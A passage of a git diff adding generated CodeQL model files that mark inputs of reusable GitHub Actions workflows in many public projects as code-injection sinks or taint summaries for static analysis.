b/actions/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.id", "code-injection", "generated"] + - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.type", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml new file mode 100644 index 000000000000..0d162f9c66b0 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml new file mode 100644 index 000000000000..730a0fc622dd --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml 
@@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.TARGET_NAME", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.EXTRA_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BUILT_EARTHLY_PATH", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "input.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.EXTRA_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.BUILT_EARTHLY_PATH", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.TEST_TARGET", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.BINARY_COMPOSE", "code-injection", "generated"] + - 
["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.RUN_EARTHLY_TEST_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.BUILT_EARTHLY_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml new file mode 100644 index 000000000000..7c74a66467b8 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml new file mode 100644 index 000000000000..af7c7e941118 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml new file mode 100644 index 000000000000..01a7939de43e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "input.solution", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml new file mode 100644 index 000000000000..efd1a84bfb5c --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "input.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.config", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "input.base-url", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "input.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "input.version", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.deploy", "output.deploy", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml new file mode 100644 index 000000000000..715a3861fd92 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.run-id", "output.run-id", "taint", "manual"] + - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.check-name", "output.check-name", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml new file mode 100644 index 000000000000..bad92ff76790 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.testTimeout", "code-injection", "generated"] + - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml new file mode 100644 index 000000000000..90503b3ad3e2 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "input.arch", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.scenario", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.testTimeout", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.count", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml new file mode 100644 index 000000000000..3d6de142622a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "input.arch", "code-injection", "generated"] + - ["eventstore/eventstore/.github/workflows/build-container-reusable.yml", "*", "input.container-runtime", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml new file mode 100644 index 000000000000..ab48425c038b --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "input.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml new file mode 100644 index 000000000000..6c0165b65a91 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.image-tag", "code-injection", "generated"] + - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.tag-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml new file mode 100644 index 000000000000..f33f433df1f9 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "input.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml new file mode 100644 index 000000000000..fb700fa7a892 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml 
@@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.aws_s3_cp_extra_args", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.s3_path", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.filter", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.artifact_tag", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "input.filter", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "input.artifact_tag", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "input.pypirc", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "input.cuda_short_version", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "input.torch_version", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/linters_reusable.yml", "*", "input.pre-script", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml new file mode 100644 index 000000000000..60ab0a23c746 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.build_type", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "input.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "input.arch", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "input.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "input.bucket_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml new file mode 100644 index 000000000000..e0a72159a7b0 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml new file mode 100644 index 000000000000..7483ab3366ce --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml new file mode 100644 index 000000000000..137558d68d01 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.test_timeout", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.log_level", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "input.bin_name", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "input.has_ffi", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml new file mode 100644 index 000000000000..cb48bce89cfa --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml 
@@ -0,0 +1,19 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.triggered_by_callable", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.package_version_number", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.base_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.cpp_release_version", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.platforms", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.runIntegrationTests", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.working_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.release_label", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.create_new_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_windows.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_tvos.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_macos.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_linux.yml", "*", "input.apis", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml new file mode 100644 index 000000000000..9f8338302a3e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "input.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml new file mode 100644 index 000000000000..49f73a1d620f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "input.unstable", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.last_commit", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.binary_name_stem", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "input.runner", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_vscode_ext.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_sdk.yml", "*", "input.ver_num", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml new file mode 100644 index 000000000000..e1e8de225309 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "input.pattern", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml new file mode 100644 index 000000000000..c2f634f7d000 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "input.before-build", "code-injection", "generated"] + - ["flyteorg/flyte/.github/workflows/integration.yml", "*", "input.component", "code-injection", "generated"] + - ["flyteorg/flyte/.github/workflows/component_docker_build.yml", "*", "input.component", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml new file mode 100644 index 000000000000..89dcb32c453b --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.org", "code-injection", "generated"] + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.solution", "code-injection", "generated"] + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.compose-command", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml new file mode 100644 index 000000000000..2ea319538441 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "input.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml new file mode 100644 index 000000000000..b9e9d879a66a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.output-path", "code-injection", "generated"] + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.settings", "code-injection", "generated"] + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.requirements", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml new file mode 100644 index 000000000000..8a22c8415e63 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "input.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml new file mode 100644 index 000000000000..a5db7a9533e4 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.panaThreshold", "code-injection", "generated"] + - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.sdk", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml new file mode 100644 index 000000000000..31113d603ffc --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "input.target", "code-injection", "generated"] + - ["getsentry/sentry-unity/.github/workflows/android-smoke-test.yml", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml new file mode 100644 index 000000000000..d8e08a8e2bd8 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "input.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml new file mode 100644 index 000000000000..b7478e325a2b --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml new file mode 100644 index 000000000000..fff04025bc52 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml new file mode 100644 index 000000000000..be5ac94db5c9 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.path", "code-injection", "generated"] + - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml new file mode 100644 index 000000000000..b8633806ac7e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml new file mode 100644 index 000000000000..8e534e5be923 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml new file mode 100644 index 000000000000..44aa0ea3a928 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.build-version", "code-injection", "generated"] + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.wave-app-name", "code-injection", "generated"] + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.working-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml new file mode 100644 index 000000000000..cd17a2ca4a59 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml 
